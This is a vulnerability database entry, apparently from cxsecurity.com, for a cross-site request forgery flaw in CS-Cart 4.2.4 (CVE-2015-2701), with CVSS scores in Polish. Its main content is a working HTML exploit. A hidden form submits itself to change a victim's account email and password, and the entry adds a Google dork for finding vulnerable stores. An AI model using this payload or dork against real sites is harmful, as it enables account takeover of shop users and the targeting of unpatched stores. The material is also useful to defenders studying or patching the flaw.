Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
CS-Cart 4.2.4 CSRF
2015.03.26
Credit:
Luis Santana
Risk:
Low
Local:
No
Remote:
Yes
CVE:
CVE-2015-2701
CWE:
N/A
Dork:
intext:\" 2004-2015 Simtech\"
Ogólna skala CVSS:
6.8/10
Znaczenie:
6.4/10
Łatwość wykorzystania:
8.6/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Średnia
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Częściowy
# Exploit Title: CS-Cart 4.2.4 CSRF # Google Dork: intext:"© 2004-2015 Simtech" # Date: March 11, 2015 # Exploit Author: Luis Santana # Vendor Homepage: http://cs-cart.com # Software Link: https://www.cs-cart.com/index.php?dispatch=pages.get_trial&page_id=297&edition=ultimate # Version: 4.2.4 # Tested on: Linux + PHP # CVE : [if one exists, or other VDB reference] Standard CSRF, allow you to change a users's password. Fairly lame but I noticed no one had reported this bug yet. Exploit pasted below and attached. <html> <head> <title>CS-CART CSRF 0day Exploit</title> </head> <body> <!-- Discovered By: Connection Exploit By: Connection Blacksun Hacker's Club irc.blacksunhackers.com #lobby --> <form action="http://<victim>/cscart/profiles-update/?selected_section=general" method="POST" id="CSRF" style="visibility:hidden"> <input type="hidden" name="user_data[email]" value="hacked@lol.dongs" /> <input type="hidden" name="user_data[password1]" value="CSRFpass" /> <input type="hidden" name="user_data[password2]" value="CSRFpass" /> <input type="hidden" name="user_data[profile_name]" value="Concept" /> <input type="hidden" name="dispatch[profiles.update]" value="" /> </form> <script> document.getElementById("CSRF").submit(); </script> </body> </html> Luis Santana - Security+ Administrator - http://hacktalk.net HackTalk Security - Security From The Underground
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top